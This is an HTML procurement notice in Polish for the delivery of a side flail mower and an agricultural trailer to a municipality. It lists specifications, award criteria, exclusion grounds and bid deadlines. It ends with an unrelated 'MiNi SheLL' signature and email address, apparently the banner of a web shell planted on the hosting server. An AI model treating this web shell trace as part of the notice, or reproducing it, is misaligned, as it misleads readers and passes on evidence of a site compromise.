<h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zamówienia obejmuje dostawę następujących maszyn komunalnych: <br/>- Kosiarka bijakowa boczna <br/>- Przyczepa rolnicza<br/><br/>Podstawowe wymagania sprzętowe: <br/>1. Kosiarka bijakowa boczna <br/>- Rok produkcji – kosiarka fabrycznie nowa, rok produkcji co najmniej 2022 lub <br/>nowsza, <br/>- Maszyna musi współpracować z ciągnikiem Zetor Proxima, zaczepiana na tylnym TUZ, możliwość nachylenie do – 60o, + 90o, z regulowanym hydraulicznie przesuwem bocznym, <br/>- Konstrukcja wzmocniona, umożliwiająca pracę w ciężkich warunkach, <br/>- Kosiarka wyposażona w bezpiecznik hydrauliczny, <br/>- Liczba noży min. 14 szt. <br/>- Szerokość robocza min. 1600 mm., <br/>-Regulacja wysokości koszenia za pomocą wału kopiującego, <br/>- Kosiarka musi być gotowa do natychmiastowej pracy, <br/><br/>2. Przyczepa rolnicza <br/>- Rok produkcji – przyczepa fabrycznie nowa, rok produkcji co najmniej 2022 lub nowsza, <br/>- przyczepa dwuosiowa – tandem, <br/>- wywrot trójstronny (prawo, lewo i tył), <br/>- ładowność min. 6 ton, <br/>- burty 50 cm. wysokości, <br/>- przyczepa musi być wyposażona w: <br/>• nadstawki pełne 50 cm., <br/>• mocowanie koła zapasowego oraz oczywiście koło zapasowe, <br/>• plandekę oraz mocowania/stelaż do plandeki, <br/>• drabinkę do wejścia, <br/>• stopę podporową, <br/>• dyszel typu V z zaczepem sztywnym z okiem 40 mm., <br/>• błotniki kół, <br/>• oświetlenie. <br/><br/>Z uwagi na ograniczoną liczbę znaków pozostałe informacje Zamawijący zawarł z SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">16500000-0 - Przyczepy lub naczepy samozaładowcze i wyładowcze do celów rolniczych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">16311000-8 - Kosiarki do trawników</p> <p class="mb-0">16310000-1 - Kosiarki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający oceni i porówna jedynie te oferty, które: <br/>1) nie zostaną odrzucone przez Zamawiającego, <br/>2) zostaną wyrażone w PLN. <br/>2. Cena oferty winna być obliczona w następujący sposób: <br/>1) wykonawca określi cenę netto całego zamówienia, <br/>2) wykonawca obliczy w oparciu o pkt 1) wartość podatku VAT, <br/>3) wykonawca zliczy kwoty występujące w pkt 1) tj. cenę netto całego zamówienia oraz w pkt 2) tj. należny podatek VAT od całości zamówienia a następnie poda cenę całości zamówienia (brutto) co będzie stanowić „cenę oferty”, <br/>4) Cena całego zamówienia obejmuje wszystkie koszty związane z realizacją zamówienia. <br/>5) W przypadku rozbieżności w cenie podanej cyframi a podanej słownie, wiążąca będzie cena podana słownie. <br/>3. Opis kryteriów wraz z podaniem znaczenia: <br/>1) cena 60 %, <br/>2) okres dodatkowej gwarancji: 20% <br/>Przez „dodatkową gwarancję” Zamawiający rozumie udzielenie gwarancji na okres powyżej 24 miesięcy, maksymalnie 60 miesięcy na cały sprzęt. Wykonawca zobowiązany jest do wskazania zaproponowanego okresu gwarancji w tych granicach. W przypadku zaproponowania przez Wykonawcę okresu gwarancji większego niż 60 miesięcy oferta oceniona zostanie jak dla 60 miesięcy. W przypadku gdy Wykonawca skróci okres <br/>gwarancji poniżej 24 miesięcy, oferta podlegać będzie odrzuceniu na podstawie art. 226 ust 1 pkt. 5) ustawy PZP. <br/>3) termin dostawy: 20% <br/>Przez „termin dostawy” Zamawiający rozumie określenie ilości miesięcy, licząc od dnia podpisania umowy, w ciągu których zostanie zrealizowane całe zamówienie. Dostawa powinna zostać zrealizowana w okresie do 3 miesięcy od dnia podpisania umowy. <br/>Wykonawca zobowiązany jest do wskazania ilości miesięcy w druku oferty. Zamawiający przyzna dodatkowe punkty za skrócenie terminu realizacji zamówienia od wymaganego określonego w Rozdziale VI. W przypadku gdy Wykonawca skróci termin realizacji poniżej 1 miesiąca, oferta zostanie oceniona, jak dla 1 miesiąca. Jeżeli Wykonawca nie zadeklaruje żadnego terminu realizacji zamówienia w formularzu ofertowym lub zaproponuje termin dłuższy niż 3 miesiące, oferta zostanie odrzucona na podstawie <br/>art. 226 ust 1 pkt. 5) ustawy PZP.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres dodatkowej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku <br/>przynależności do tej samej grupy kapitałowej, w odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, <br/><br/>2) odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy <br/>wymagają wpisu do rejestru lub ewidencji,</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia, o których mowa w Rozdziale VIII pkt. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane / usługi / dostawy wykonają poszczególni wykonawcy w odniesieniu do warunków, które zostały określone w Rozdziale VII pkt 2 SWZ – zgodnie z załącznikiem nr 4 do SWZ. <br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <br/>5. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych w „Istotnych postanowieniach umowy”, które stanowią <br/>załączniki nr 5 do SWZ. <br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie. <br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 455 ust. 1 pkt 1) - 4), ust. 2 - 4 uPzp oraz w „Istotnych postanowieniach umowy”, które stanowią załączniki nr 5 do SWZ. <br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-19 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/mrocza</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-19 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-17</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com